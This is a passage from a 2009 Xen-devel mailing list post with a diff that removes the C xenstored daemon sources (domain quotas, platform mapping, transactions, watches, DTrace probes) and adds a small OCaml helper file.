&& ((d->nbentry += num) < 0)) - d->nbentry = 0; -} - -int domain_entry(struct connection *conn) -{ - return (domain_is_unprivileged(conn)) - ? conn->domain->nbentry - : 0; -} - -void domain_watch_inc(struct connection *conn) -{ - if (!conn || !conn->domain) - return; - conn->domain->nbwatch++; -} - -void domain_watch_dec(struct connection *conn) -{ - if (!conn || !conn->domain) - return; - if (conn->domain->nbwatch) - conn->domain->nbwatch--; -} - -int domain_watch(struct connection *conn) -{ - return (domain_is_unprivileged(conn)) - ? conn->domain->nbwatch - : 0; -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.h --- a/tools/xenstore/xenstored_domain.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,67 +0,0 @@ -/* - Domain communications for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_DOMAIN_H -#define _XENSTORED_DOMAIN_H - -void handle_event(void); - -/* domid, mfn, eventchn, path */ -void do_introduce(struct connection *conn, struct buffered_data *in); - -/* domid */ -void do_is_domain_introduced(struct connection *conn, const char *domid_str); - -/* domid */ -void do_release(struct connection *conn, const char *domid_str); - -/* domid */ -void do_resume(struct connection *conn, const char *domid_str); - -/* domid, target */ -void do_set_target(struct connection *conn, struct buffered_data *in); - -/* domid */ -void do_get_domain_path(struct connection *conn, const char *domid_str); - -/* Returns the event channel handle */ -int domain_init(void); - -/* Returns the implicit path of a connection (only domains have this) */ -const char *get_implicit_path(const struct connection *conn); - -/* Read existing connection information from store. */ -void restore_existing_connections(void); - -/* Can connection attached to domain read/write. */ -bool domain_can_read(struct connection *conn); -bool domain_can_write(struct connection *conn); - -bool domain_is_unprivileged(struct connection *conn); - -/* Quota manipulation */ -void domain_entry_inc(struct connection *conn, struct node *); -void domain_entry_dec(struct connection *conn, struct node *); -void domain_entry_fix(unsigned int domid, int num); -int domain_entry(struct connection *conn); -void domain_watch_inc(struct connection *conn); -void domain_watch_dec(struct connection *conn); -int domain_watch(struct connection *conn); - -#endif /* _XENSTORED_DOMAIN_H */ diff -r 10a8fae412c5 tools/xenstore/xenstored_linux.c --- a/tools/xenstore/xenstored_linux.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,73 +0,0 @@ -/****************************************************************************** - * - * Copyright 2006 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * Copyright (C) 2005 Rusty Russell IBM Corporation - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation, version 2 of the - * License. - */ - -#include -#include -#include -#include - -#include "xenstored_core.h" - -#define XENSTORED_PROC_KVA "/proc/xen/xsd_kva" -#define XENSTORED_PROC_PORT "/proc/xen/xsd_port" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - int rc; - evtchn_port_t port; - char str[20]; - - fd = open(XENSTORED_PROC_PORT, O_RDONLY); - if (fd == -1) - return -1; - - rc = read(fd, str, sizeof(str)); - if (rc == -1) - { - int err = errno; - close(fd); - errno = err; - return -1; - } - - str[rc] = '\0'; - port = strtoul(str, NULL, 0); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open(XENSTORED_PROC_KVA, O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ -} diff -r 10a8fae412c5 tools/xenstore/xenstored_netbsd.c --- a/tools/xenstore/xenstored_netbsd.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,73 +0,0 @@ -/****************************************************************************** - * - * Copyright 2006 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * Copyright (C) 2005 Rusty Russell IBM Corporation - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation, version 2 of the - * License. - */ - -#include -#include -#include -#include - -#include "xenstored_core.h" - -#define XENSTORED_PROC_KVA "/dev/xsd_kva" -#define XENSTORED_PROC_PORT "/kern/xen/xsd_port" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - int rc; - evtchn_port_t port; - char str[20]; - - fd = open(XENSTORED_PROC_PORT, O_RDONLY); - if (fd == -1) - return -1; - - rc = read(fd, str, sizeof(str)); - if (rc == -1) - { - int err = errno; - close(fd); - errno = err; - return -1; - } - - str[rc] = '\0'; - port = strtoul(str, NULL, 0); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open(XENSTORED_PROC_KVA, O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ -} diff -r 10a8fae412c5 tools/xenstore/xenstored_probes.d --- a/tools/xenstore/xenstored_probes.d Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,28 +0,0 @@ -/* - * Copyright 2007 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, version 2 of the License. - */ - -#include - -provider xenstore { - /* tx id, dom id, pid, type, msg */ - probe msg(uint32_t, unsigned int, pid_t, int, const char *); - /* tx id, dom id, pid, type, reply */ - probe reply(uint32_t, unsigned int, pid_t, int, const char *); - /* tx id, dom id, pid, reply */ - probe error(uint32_t, unsigned int, pid_t, const char *); - /* dom id, pid, watch details */ - probe watch_event(unsigned int, pid_t, const char *); -}; - -#pragma D attributes Evolving/Evolving/Common provider xenstore provider -#pragma D attributes Private/Private/Unknown provider xenstore module -#pragma D attributes Private/Private/Unknown provider xenstore function -#pragma D attributes Evolving/Evolving/Common provider xenstore name -#pragma D attributes Evolving/Evolving/Common provider xenstore args - diff -r 10a8fae412c5 tools/xenstore/xenstored_solaris.c --- a/tools/xenstore/xenstored_solaris.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,168 +0,0 @@ -/****************************************************************************** - * - * Copyright 2006 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * Copyright (C) 2005 Rusty Russell IBM Corporation - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation, version 2 of the - * License. - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -#include "talloc.h" -#include "xenstored_core.h" -#include "xenstored_probes.h" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - evtchn_port_t port; - - fd = open("/dev/xen/xenbus", O_RDONLY); - if (fd == -1) - return -1; - - port = ioctl(fd, IOCTL_XENBUS_XENSTORE_EVTCHN); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open("/dev/xen/xenbus", O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ - int fd; - - fd = open("/dev/xen/xenbus", O_RDONLY); - - (void) ioctl(fd, IOCTL_XENBUS_NOTIFY_UP); - - close(fd); -} - -static pid_t cred(const struct connection *conn) -{ - ucred_t *ucred = NULL; - pid_t pid; - - if (conn->domain) - return (0); - - if (getpeerucred(conn->fd, &ucred) == -1) - return (0); - - pid = ucred_getpid(ucred); - - ucred_free(ucred); - return (pid); -} - -/* - * The strings are often a number of nil-separated strings. We'll just - * replace the separators with spaces - not quite right, but good - * enough. - */ -static char * -mangle(const struct connection *conn, const struct buffered_data *in) -{ - char *str; - int i; - - if (in->hdr.msg.len == 0) - return (talloc_strdup(conn, "")); - - if ((str = talloc_zero_size(conn, in->hdr.msg.len + 1)) == NULL) - return (NULL); - - memcpy(str, in->buffer, in->hdr.msg.len); - - /* - * The protocol is absurdly inconsistent in whether the length - * includes the terminating nil or not; replace all nils that - * aren't the last one. - */ - for (i = 0; i < (in->hdr.msg.len - 1); i++) { - if (str[i] == '\0') - str[i] = ' '; - } - - return (str); -} - -void -dtrace_io(const struct connection *conn, const struct buffered_data *in, - int io_out) -{ - if (!io_out) { - if (XENSTORE_MSG_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_MSG(in->hdr.msg.tx_id, conn->id, cred(conn), - in->hdr.msg.type, mangled); - } - - goto out; - } - - switch (in->hdr.msg.type) { - case XS_ERROR: - if (XENSTORE_ERROR_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_ERROR(in->hdr.msg.tx_id, conn->id, - cred(conn), mangled); - } - break; - - case XS_WATCH_EVENT: - if (XENSTORE_WATCH_EVENT_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_WATCH_EVENT(conn->id, cred(conn), mangled); - } - break; - - default: - if (XENSTORE_REPLY_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_REPLY(in->hdr.msg.tx_id, conn->id, cred(conn), - in->hdr.msg.type, mangled); - } - break; - } - -out: - /* - * 6589130 dtrace -G fails for certain tail-calls on x86 - */ - asm("nop"); -} diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.c --- a/tools/xenstore/xenstored_transaction.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,291 +0,0 @@ -/* - Transaction code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "talloc.h" -#include "list.h" -#include "xenstored_transaction.h" -#include "xenstored_watch.h" -#include "xenstored_domain.h" -#include "xs_lib.h" -#include "utils.h" - -struct changed_node -{ - /* List of all changed nodes in the context of this transaction. */ - struct list_head list; - - /* The name of the node. */ - char *node; - - /* And the children? (ie. rm) */ - bool recurse; -}; - -struct changed_domain -{ - /* List of all changed domains in the context of this transaction. */ - struct list_head list; - - /* Identifier of the changed domain. */ - unsigned int domid; - - /* Amount by which this domain's nbentry field has changed. */ - int nbentry; -}; - -struct transaction -{ - /* List of all transactions active on this connection. */ - struct list_head list; - - /* Connection-local identifier for this transaction. */ - uint32_t id; - - /* Generation when transaction started. */ - unsigned int generation; - - /* TDB to work on, and filename */ - TDB_CONTEXT *tdb; - char *tdb_name; - - /* List of changed nodes. */ - struct list_head changes; - - /* List of changed domains - to record the changed domain entry number */ - struct list_head changed_domains; -}; - -extern int quota_max_transaction; -static unsigned int generation; - -/* Return tdb context to use for this connection. */ -TDB_CONTEXT *tdb_transaction_context(struct transaction *trans) -{ - return trans->tdb; -} - -/* Callers get a change node (which can fail) and only commit after they've - * finished. This way they don't have to unwind eg. a write. */ -void add_change_node(struct transaction *trans, const char *node, bool recurse) -{ - struct changed_node *i; - - if (!trans) { - /* They're changing the global database. */ - generation++; - return; - } - - list_for_each_entry(i, &trans->changes, list) - if (streq(i->node, node)) - return; - - i = talloc(trans, struct changed_node); - i->node = talloc_strdup(i, node); - i->recurse = recurse; - list_add_tail(&i->list, &trans->changes); -} - -static int destroy_transaction(void *_transaction) -{ - struct transaction *trans = _transaction; - - trace_destroy(trans, "transaction"); - if (trans->tdb) - tdb_close(trans->tdb); - unlink(trans->tdb_name); - return 0; -} - -struct transaction *transaction_lookup(struct connection *conn, uint32_t id) -{ - struct transaction *trans; - - if (id == 0) - return NULL; - - list_for_each_entry(trans, &conn->transaction_list, list) - if (trans->id == id) - return trans; - - return ERR_PTR(-ENOENT); -} - -void do_transaction_start(struct connection *conn, struct buffered_data *in) -{ - struct transaction *trans, *exists; - char id_str[20]; - - /* We don't support nested transactions. */ - if (conn->transaction) { - send_error(conn, EBUSY); - return; - } - - if (conn->id && conn->transaction_started > quota_max_transaction) { - send_error(conn, ENOSPC); - return; - } - - /* Attach transaction to input for autofree until it's complete */ - trans = talloc(in, struct transaction); - INIT_LIST_HEAD(&trans->changes); - INIT_LIST_HEAD(&trans->changed_domains); - trans->generation = generation; - trans->tdb_name = talloc_asprintf(trans, "%s.%p", - xs_daemon_tdb(), trans); - trans->tdb = tdb_copy(tdb_context(conn), trans->tdb_name); - if (!trans->tdb) { - send_error(conn, errno); - return; - } - /* Make it close if we go away. */ - talloc_steal(trans, trans->tdb); - - /* Pick an unused transaction identifier. */ - do { - trans->id = conn->next_transaction_id; - exists = transaction_lookup(conn, conn->next_transaction_id++); - } while (!IS_ERR(exists)); - - /* Now we own it. */ - list_add_tail(&trans->list, &conn->transaction_list); - talloc_steal(conn, trans); - talloc_set_destructor(trans, destroy_transaction); - conn->transaction_started++; - - snprintf(id_str, sizeof(id_str), "%u", trans->id); - send_reply(conn, XS_TRANSACTION_START, id_str, strlen(id_str)+1); -} - -void do_transaction_end(struct connection *conn, const char *arg) -{ - struct changed_node *i; - struct changed_domain *d; - struct transaction *trans; - - if (!arg || (!streq(arg, "T") && !streq(arg, "F"))) { - send_error(conn, EINVAL); - return; - } - - if ((trans = conn->transaction) == NULL) { - send_error(conn, ENOENT); - return; - } - - conn->transaction = NULL; - list_del(&trans->list); - conn->transaction_started--; - - /* Attach transaction to arg for auto-cleanup */ - talloc_steal(arg, trans); - - if (streq(arg, "T")) { - /* FIXME: Merge, rather failing on any change. */ - if (trans->generation != generation) { - send_error(conn, EAGAIN); - return; - } - if (!replace_tdb(trans->tdb_name, trans->tdb)) { - send_error(conn, errno); - return; - } - /* Don't close this: we won! */ - trans->tdb = NULL; - - /* fix domain entry for each changed domain */ - list_for_each_entry(d, &trans->changed_domains, list) - domain_entry_fix(d->domid, d->nbentry); - - /* Fire off the watches for everything that changed. */ - list_for_each_entry(i, &trans->changes, list) - fire_watches(conn, i->node, i->recurse); - generation++; - } - send_ack(conn, XS_TRANSACTION_END); -} - -void transaction_entry_inc(struct transaction *trans, unsigned int domid) -{ - struct changed_domain *d; - - list_for_each_entry(d, &trans->changed_domains, list) - if (d->domid == domid) { - d->nbentry++; - return; - } - - d = talloc(trans, struct changed_domain); - d->domid = domid; - d->nbentry = 1; - list_add_tail(&d->list, &trans->changed_domains); -} - -void transaction_entry_dec(struct transaction *trans, unsigned int domid) -{ - struct changed_domain *d; - - list_for_each_entry(d, &trans->changed_domains, list) - if (d->domid == domid) { - d->nbentry--; - return; - } - - d = talloc(trans, struct changed_domain); - d->domid = domid; - d->nbentry = -1; - list_add_tail(&d->list, &trans->changed_domains); -} - -void conn_delete_all_transactions(struct connection *conn) -{ - struct transaction *trans; - - while ((trans = list_top(&conn->transaction_list, - struct transaction, list))) { - list_del(&trans->list); - talloc_free(trans); - } - - assert(conn->transaction == NULL); - - conn->transaction_started = 0; -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.h --- a/tools/xenstore/xenstored_transaction.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,43 +0,0 @@ -/* - Transaction code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ -#ifndef _XENSTORED_TRANSACTION_H -#define _XENSTORED_TRANSACTION_H -#include "xenstored_core.h" - -struct transaction; - -void do_transaction_start(struct connection *conn, struct buffered_data *node); -void do_transaction_end(struct connection *conn, const char *arg); - -struct transaction *transaction_lookup(struct connection *conn, uint32_t id); - -/* inc/dec entry number local to trans while changing a node */ -void transaction_entry_inc(struct transaction *trans, unsigned int domid); -void transaction_entry_dec(struct transaction *trans, unsigned int domid); - -/* This node was changed: can fail and longjmp. */ -void add_change_node(struct transaction *trans, const char *node, - bool recurse); - -/* Return tdb context to use for this connection. */ -TDB_CONTEXT *tdb_transaction_context(struct transaction *trans); - -void conn_delete_all_transactions(struct connection *conn); - -#endif /* _XENSTORED_TRANSACTION_H */ diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.c --- a/tools/xenstore/xenstored_watch.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,218 +0,0 @@ -/* - Watch code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include "talloc.h" -#include "list.h" -#include "xenstored_watch.h" -#include "xs_lib.h" -#include "utils.h" -#include "xenstored_domain.h" - -extern int quota_nb_watch_per_domain; - -struct watch -{ - /* Watches on this connection */ - struct list_head list; - - /* Current outstanding events applying to this watch. */ - struct list_head events; - - /* Is this relative to connnection's implicit path? */ - const char *relative_path; - - char *token; - char *node; -}; - -static void add_event(struct connection *conn, - struct watch *watch, - const char *name) -{ - /* Data to send (node\0token\0). */ - unsigned int len; - char *data; - - if (!check_event_node(name)) { - /* Can this conn load node, or see that it doesn't exist? */ - struct node *node = get_node(conn, name, XS_PERM_READ); - /* - * XXX We allow EACCES here because otherwise a non-dom0 - * backend driver cannot watch for disappearance of a frontend - * xenstore directory. When the directory disappears, we - * revert to permissions of the parent directory for that path, - * which will typically disallow access for the backend. - * But this breaks device-channel teardown! - * Really we should fix this better... - */ - if (!node && errno != ENOENT && errno != EACCES) - return; - } - - if (watch->relative_path) { - name += strlen(watch->relative_path); - if (*name == '/') /* Could be "" */ - name++; - } - - len = strlen(name) + 1 + strlen(watch->token) + 1; - data = talloc_array(watch, char, len); - strcpy(data, name); - strcpy(data + strlen(name) + 1, watch->token); - send_reply(conn, XS_WATCH_EVENT, data, len); - talloc_free(data); -} - -void fire_watches(struct connection *conn, const char *name, bool recurse) -{ - struct connection *i; - struct watch *watch; - - /* During transactions, don't fire watches. */ - if (conn && conn->transaction) - return; - - /* Create an event for each watch. */ - list_for_each_entry(i, &connections, list) { - list_for_each_entry(watch, &i->watches, list) { - if (is_child(name, watch->node)) - add_event(i, watch, name); - else if (recurse && is_child(watch->node, name)) - add_event(i, watch, watch->node); - } - } -} - -static int destroy_watch(void *_watch) -{ - trace_destroy(_watch, "watch"); - return 0; -} - -void do_watch(struct connection *conn, struct buffered_data *in) -{ - struct watch *watch; - char *vec[2]; - bool relative; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (strstarts(vec[0], "@")) { - relative = false; - if (strlen(vec[0]) > XENSTORE_REL_PATH_MAX) { - send_error(conn, EINVAL); - return; - } - /* check if valid event */ - } else { - relative = !strstarts(vec[0], "/"); - vec[0] = canonicalize(conn, vec[0]); - if (!is_valid_nodename(vec[0])) { - send_error(conn, errno); - return; - } - } - - /* Check for duplicates. */ - list_for_each_entry(watch, &conn->watches, list) { - if (streq(watch->node, vec[0]) && - streq(watch->token, vec[1])) { - send_error(conn, EEXIST); - return; - } - } - - if (domain_watch(conn) > quota_nb_watch_per_domain) { - send_error(conn, E2BIG); - return; - } - - watch = talloc(conn, struct watch); - watch->node = talloc_strdup(watch, vec[0]); - watch->token = talloc_strdup(watch, vec[1]); - if (relative) - watch->relative_path = get_implicit_path(conn); - else - watch->relative_path = NULL; - - INIT_LIST_HEAD(&watch->events); - - domain_watch_inc(conn); - list_add_tail(&watch->list, &conn->watches); - trace_create(watch, "watch"); - talloc_set_destructor(watch, destroy_watch); - send_ack(conn, XS_WATCH); - - /* We fire once up front: simplifies clients and restart. */ - add_event(conn, watch, watch->node); -} - -void do_unwatch(struct connection *conn, struct buffered_data *in) -{ - struct watch *watch; - char *node, *vec[2]; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - node = canonicalize(conn, vec[0]); - list_for_each_entry(watch, &conn->watches, list) { - if (streq(watch->node, node) && streq(watch->token, vec[1])) { - list_del(&watch->list); - talloc_free(watch); - domain_watch_dec(conn); - send_ack(conn, XS_UNWATCH); - return; - } - } - send_error(conn, ENOENT); -} - -void conn_delete_all_watches(struct connection *conn) -{ - struct watch *watch; - - while ((watch = list_top(&conn->watches, struct watch, list))) { - list_del(&watch->list); - talloc_free(watch); - domain_watch_dec(conn); - } -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.h --- a/tools/xenstore/xenstored_watch.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,35 +0,0 @@ -/* - Watch code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_WATCH_H -#define _XENSTORED_WATCH_H - -#include "xenstored_core.h" - -void do_watch(struct connection *conn, struct buffered_data *in); -void do_unwatch(struct connection *conn, struct buffered_data *in); - -/* Fire all watches: recurse means all the children are affected (ie. rm). */ -void fire_watches(struct connection *conn, const char *name, bool recurse); - -void dump_watches(struct connection *conn); - -void conn_delete_all_watches(struct connection *conn); - -#endif /* _XENSTORED_WATCH_H */ diff -r 10a8fae412c5 tools/xenstore/xs.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xs.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,8 @@ +let xs_single connection message_type transaction_id payload = + let message = Message.make message_type transaction_id 0l payload in + connection#write message;; + +let rec xs_read connection = + match (connection#read) with + | Some m -> m + | None -> xs_read connection;; diff -r 10a8fae412c5 tools/xenstore/xs_tdb_dump.c --- a/tools/xenstore/xs_tdb_dump.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,82 +0,0 @@ -/* Simple program to dump out all records of TDB */ -#include -#include -#include -#include -#include -#include -#include "xs_lib.h" -#include "tdb.h" -#include "talloc.h" -#include "utils.h" - -struct record_hdr { - uint32_t num_perms; - uint32_t datalen; - uint32_t childlen; - struct xs_permissions perms[0]; -}; - -static uint32_t total_size(struct record_hdr *hdr) -{ - return sizeof(*hdr) + hdr->num_perms * sizeof(struct xs_permissions) - + hdr->datalen + hdr->childlen; -} - -static char perm_to_char(enum xs_perm_type perm) -{ - return perm == XS_PERM_READ ? 'r' : - perm == XS_PERM_WRITE ? 'w' : - perm == XS_PERM_NONE ? '-' : - perm == (XS_PERM_READ|XS_PERM_WRITE) ? 'b' : - '?'; -} - -int main(int argc, char *argv[]) -{ - TDB_DATA key; - TDB_CONTEXT *tdb; - - if (argc != 2) - barf("Usage: xs_tdb_dump "); - - tdb = tdb_open(talloc_strdup(NULL, argv[1]), 0, 0, O_RDONLY, 0); - if (!tdb) - barf_perror("Could not open %s", argv[1]); - - key = tdb_firstkey(tdb); - while (key.dptr) { - TDB_DATA data; - struct record_hdr *hdr; - - data = tdb_fetch(tdb, key); - hdr = (void *)data.dptr; - if (data.dsize < sizeof(*hdr)) - fprintf(stderr, "%.*s: BAD truncated\n", - (int)key.dsize, key.dptr); - else if (data.dsize != total_size(hdr)) - fprintf(stderr, "%.*s: BAD length %i for %i/%i/%i (%i)\n", - (int)key.dsize, key.dptr, (int)data.dsize, - hdr->num_perms, hdr->datalen, - hdr->childlen, total_size(hdr)); - else { - unsigned int i; - char *p; - - printf("%.*s: ", (int)key.dsize, key.dptr); - for (i = 0; i < hdr->num_perms; i++) - printf("%s%c%i", - i == 0 ? "" : ",", - perm_to_char(hdr->perms[i].perms), - hdr->perms[i].id); - p = (void *)&hdr->perms[hdr->num_perms]; - printf(" %.*s\n", hdr->datalen, p); - p += hdr->datalen; - for (i = 0; i < hdr->childlen; i += strlen(p+i)+1) - printf("\t-> %s\n", p+i); - } - key = tdb_nextkey(tdb, key); - } - return 0; -} - --------------080103040208000401080509 Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Disposition: inline _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel --------------080103040208000401080509--